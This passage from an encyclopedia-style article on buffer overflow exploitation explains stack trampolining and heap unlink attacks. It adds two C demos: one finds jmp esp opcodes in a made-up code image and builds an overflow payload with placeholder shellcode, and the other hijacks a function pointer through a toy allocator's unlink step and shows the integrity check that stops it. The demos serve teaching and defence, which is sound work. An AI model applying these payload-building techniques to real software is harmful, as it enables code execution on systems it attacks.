<Li> By overwriting a function pointer or exception handler, which is subsequently executed. </Li> <Li> By overwriting a local variable (or pointer) of a different stack frame, which will be used later by the function that owns that frame. </Li> <P> If the address of the user-supplied data used to cause the stack buffer overflow is unpredictable, exploiting a stack buffer overflow to achieve remote code execution becomes much more difficult. One technique that can be used to exploit such a buffer overflow is called "trampolining". In that technique, an attacker finds a register or memory location that holds a pointer to the vulnerable stack buffer at the moment control is hijacked, and computes the location of their shellcode relative to that pointer. They then use the overwrite to jump to an instruction already in memory which makes a second jump, this time relative to the pointer (on x86, a <code>jmp esp</code> or <code>call esp</code> is the classic case); that second jump branches execution into the shellcode. Suitable instructions are often present in large bodies of code such as shared libraries. The Metasploit Project, for example, maintains a database of suitable opcodes, though it lists only those found in the Windows operating system. </P> <P> A buffer overflow occurring in the heap data area is referred to as a heap overflow and is exploitable in a manner different from that of stack-based overflows. Memory on the heap is dynamically allocated by the application at run-time and typically contains program data. Exploitation is performed by corrupting this data in specific ways to cause the application to overwrite internal structures such as linked-list pointers. The canonical heap overflow technique overwrites dynamic memory allocation linkage (such as malloc metadata) and uses the resulting pointer exchange to overwrite a program function pointer. Modern allocators add integrity checks on that linkage (for example, verifying that a chunk's list neighbours point back at it) which defeat the simplest form of this attack. </P>
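<P> The trampolining technique described above, as an added example that is not part of the original article: the code scans a constructed, made-up "code image" (assumed mapped at <code>CODE_BASE</code>) for x86 opcode sequences that branch to the address in ESP, then lays out a payload around the one it finds. Nothing is executed; the shellcode is a placeholder of <code>int3</code> bytes and the buffer-to-return-address distance is an assumed value. </P>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for a loaded module's code section (made-up bytes,
 * assumed mapped at CODE_BASE). A real exploit scans the real binary or
 * its libraries for the same opcode patterns. */
static const uint8_t code_image[] = {
    0x55, 0x89, 0xe5,   /* push ebp; mov ebp, esp */
    0x83, 0xec, 0x10,   /* sub esp, 0x10 */
    0x90, 0x90,         /* nop; nop */
    0xff, 0xe4,         /* jmp esp        <- trampoline */
    0xc3,               /* ret */
    0x54, 0xc3,         /* push esp; ret  <- trampoline */
};
#define CODE_BASE 0x08048000u

/* x86 opcode sequences that transfer control to the address held in ESP. */
const uint8_t OP_JMP_ESP[]      = {0xff, 0xe4};
const uint8_t OP_CALL_ESP[]     = {0xff, 0xd4};
const uint8_t OP_PUSH_ESP_RET[] = {0x54, 0xc3};

/* Absolute address of the first match of op[] in the image, or 0 if the
 * image contains no such instruction. */
uint32_t find_trampoline(const uint8_t *img, size_t len, uint32_t base,
                         const uint8_t *op, size_t oplen)
{
    for (size_t i = 0; i + oplen <= len; i++)
        if (memcmp(img + i, op, oplen) == 0)
            return base + (uint32_t)i;
    return 0;
}

/* Lay out a payload for a stack buffer whose saved return address lies
 * dist bytes from the start of the buffer (including any saved frame
 * pointer in between; no stack canary assumed). After the function's
 * `ret` pops the overwritten address, ESP points at the bytes that follow
 * it, so a `jmp esp` trampoline lands exactly there: the shellcode goes
 * after the return address, not in the buffer. Returns the payload
 * length, or 0 if it does not fit. */
size_t build_payload(uint8_t *out, size_t cap, size_t dist, uint32_t tramp,
                     const uint8_t *sc, size_t sclen)
{
    size_t need = dist + 4 + sclen;
    if (need > cap) return 0;
    memset(out, 'A', dist);                 /* filler up to saved EIP */
    out[dist + 0] = (uint8_t)(tramp);       /* little-endian address */
    out[dist + 1] = (uint8_t)(tramp >> 8);
    out[dist + 2] = (uint8_t)(tramp >> 16);
    out[dist + 3] = (uint8_t)(tramp >> 24);
    memcpy(out + dist + 4, sc, sclen);      /* ESP points here after ret */
    return need;
}

/* Worked run on the constructed image: an assumed 64 bytes from buffer
 * start to saved EIP, and a placeholder "shellcode" of int3 (0xcc) bytes. */
uint8_t payload_buf[128];

size_t demo_build(void)
{
    static const uint8_t sc[4] = {0xcc, 0xcc, 0xcc, 0xcc};
    uint32_t tramp = find_trampoline(code_image, sizeof code_image, CODE_BASE,
                                     OP_JMP_ESP, sizeof OP_JMP_ESP);
    if (tramp == 0) return 0;
    return build_payload(payload_buf, sizeof payload_buf, 64, tramp,
                         sc, sizeof sc);
}

int main(void)
{
    size_t n = demo_build();
    printf("jmp esp at 0x%08x, payload %zu bytes\n",
           find_trampoline(code_image, sizeof code_image, CODE_BASE,
                           OP_JMP_ESP, sizeof OP_JMP_ESP), n);
    return n ? 0 : 1;
}
```

<P> The point the layout makes is that with an ESP trampoline the attacker never needs the absolute address of the buffer: the overwritten return address is the fixed address of an instruction in a loaded module, and the shellcode is reached relative to ESP. Address-space layout randomization of that module is what takes this away. </P>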
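<P> The canonical heap technique described above, as an added example that is not part of the original article: a toy allocator (not glibc; the <code>chunk</code> layout, field names and <code>unlink_chunk</code> are assumptions for illustration) keeps free chunks on a doubly linked list threaded through their headers. An overflow from an in-use chunk into its free neighbour's <code>fd</code>/<code>bk</code> fields turns the allocator's own unlink step into a write of an attacker-chosen value to an attacker-chosen address, here a function pointer. The checked variant shows the integrity test that stops it. Nothing is executed from attacker data. </P>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy chunk header modelled on old-style allocators (assumed layout). */
struct chunk {
    size_t size;
    struct chunk *fd;   /* next free chunk */
    struct chunk *bk;   /* previous free chunk */
    uint8_t data[32];   /* user data follows the header */
};

/* Classic unlink: remove p from the free list, trusting fd and bk. */
static void unlink_chunk(struct chunk *p)
{
    struct chunk *f = p->fd, *b = p->bk;
    f->bk = b;   /* write 1: *(fd + offsetof(chunk, bk)) = bk */
    b->fd = f;   /* write 2: *(bk + offsetof(chunk, fd)) = fd */
}

/* Hardened unlink (what modern allocators do): refuse unless the list
 * neighbours really point back at p. */
static int unlink_chunk_checked(struct chunk *p)
{
    if (p->fd->bk != p || p->bk->fd != p)
        return -1;                       /* corrupted double-linked list */
    unlink_chunk(p);
    return 0;
}

/* Victim program state: the function pointer the attacker wants, and a
 * writable region standing in for shellcode. volatile so the compiler
 * cannot assume the aliased write in unlink_chunk leaves it untouched. */
static void benign_handler(void) { }
void (* volatile handler)(void) = benign_handler;
uint8_t fake_shellcode[64];

/* Arena: chunk A (in use) immediately followed by chunk B (free). */
static struct chunk arena[2];
static struct chunk free_head;

static void reset_arena(void)
{
    memset(arena, 0, sizeof arena);
    arena[0].size = arena[1].size = sizeof(struct chunk);
    free_head.fd = free_head.bk = &arena[1];      /* circular list: head <-> B */
    arena[1].fd = arena[1].bk = &free_head;
    handler = benign_handler;
}

/* Constructed attacker input: filler for A->data, then a fake header for
 * B whose fd/bk are chosen so that unlinking B performs
 *   *(fd + offsetof(bk)) = bk  ==>  handler = fake_shellcode
 *   *(bk + offsetof(fd)) = fd  ==>  clobbers 8 bytes inside fake_shellcode
 * (the second write is why real shellcode opens with a short jump over
 * its own first bytes). */
static size_t build_attack(uint8_t *out)
{
    size_t fake_size = sizeof(struct chunk);
    struct chunk *fd = (struct chunk *)((uint8_t *)&handler - offsetof(struct chunk, bk));
    struct chunk *bk = (struct chunk *)fake_shellcode;
    size_t n = 0;
    memset(out, 'A', sizeof arena[0].data);           n += sizeof arena[0].data;
    memcpy(out + n, &fake_size, sizeof fake_size);    n += sizeof fake_size;
    memcpy(out + n, &fd, sizeof fd);                  n += sizeof fd;
    memcpy(out + n, &bk, sizeof bk);                  n += sizeof bk;
    return n;
}

/* Simulate: an unchecked copy into A->data overruns into B's header, then
 * free(A) coalesces with its free neighbour B by unlinking B.
 * Returns 1 if handler now points at fake_shellcode, else 0. */
int run_heap_overflow(int hardened)
{
    uint8_t input[2 * sizeof(struct chunk)];
    size_t len = build_attack(input);
    uint8_t *a_data = (uint8_t *)arena + offsetof(struct chunk, data);

    reset_arena();
    memcpy(a_data, input, len);          /* the overflow: len > sizeof data */
    if (hardened)
        (void)unlink_chunk_checked(&arena[1]);
    else
        unlink_chunk(&arena[1]);
    return (uintptr_t)handler == (uintptr_t)fake_shellcode;
}

int main(void)
{
    printf("unchecked unlink: handler hijacked = %d\n", run_heap_overflow(0));
    printf("checked unlink:   handler hijacked = %d\n", run_heap_overflow(1));
    return 0;
}
```

<P> The attacker never writes to <code>handler</code> directly; the allocator does, while performing bookkeeping it believes is its own. That is the "pointer exchange" the text refers to, and it is why the fix belongs in the allocator's consistency checks rather than only in the code that overflowed. </P>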

By manipulating a buffer overflow an attacker can jump